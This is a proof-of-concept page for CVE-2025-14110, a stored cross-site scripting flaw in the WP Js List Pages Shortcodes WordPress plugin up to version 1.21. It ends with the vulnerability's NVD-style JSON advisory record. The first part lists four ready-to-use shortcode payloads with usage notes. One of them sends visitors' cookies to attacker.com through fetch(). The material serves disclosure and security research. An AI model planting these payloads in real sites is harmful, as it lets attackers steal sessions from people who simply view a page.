CVE-2025-14110

<!-- WordPress Shortcode XSS PoC for CVE-2025-14110 --> <!-- Author: Security Researcher --> <!-- Target: WP Js List Pages Shortcodes <= 1.21 --> <!-- PoC 1: Basic XSS via class attribute --> [wplps class='"><script>alert(document.cookie)</script>'] <!-- PoC 2: Event handler based XSS --> [wplps class='x' onmouseover='alert(document.domain)'] <!-- PoC 3: Image tag XSS (bypasses some filters) --> [wplps class='x' onerror='fetch("https://attacker.com/steal?c="+document.cookie)'] <!-- PoC 4: Stored XSS with context manipulation --> [wplps class='test\" onfocus=\"alert(1)\" autofocus=\"'] <!-- Usage: Insert any of the above shortcodes into a WordPress post/page --> <!-- When any user views the page, the XSS payload will execute --> <!-- The stored payload persists until manually removed from the content -->

{"cve": {"id": "CVE-2025-14110", "sourceIdentifier": "[email protected]", "published": "2026-01-07T12:16:52.250", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP Js List Pages Shortcodes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'class' shortcode attribute in all versions up to, and including, 1.21 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page."}, {"lang": "es", "value": "El plugin WP Js List Pages Shortcodes para WordPress es vulnerable a cross-site scripting almacenado a través del atributo de shortcode 'class' en todas las versiones hasta la 1.21, inclusive, debido a una sanitización de entrada y escape de salida insuficientes. Esto hace posible que atacantes autenticados, con acceso de nivel Colaborador y superior, inyecten scripts web arbitrarios en páginas que se ejecutarán cada vez que un usuario acceda a una página inyectada."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/tags/1.21/js-list-pages-shortcodes.php#L58", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/trunk/js-list-pages-shortcodes.php#L47", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/trunk/js-list-pages-shortcodes.php#L50", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wp-js-list-pages-shortcodes/trunk/js-list-pages-shortcodes.php#L58", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/3f8dced7-cbe1-4d50-9fa0-1cf441dddefa?source=cve", "source": "[email protected]"}]}}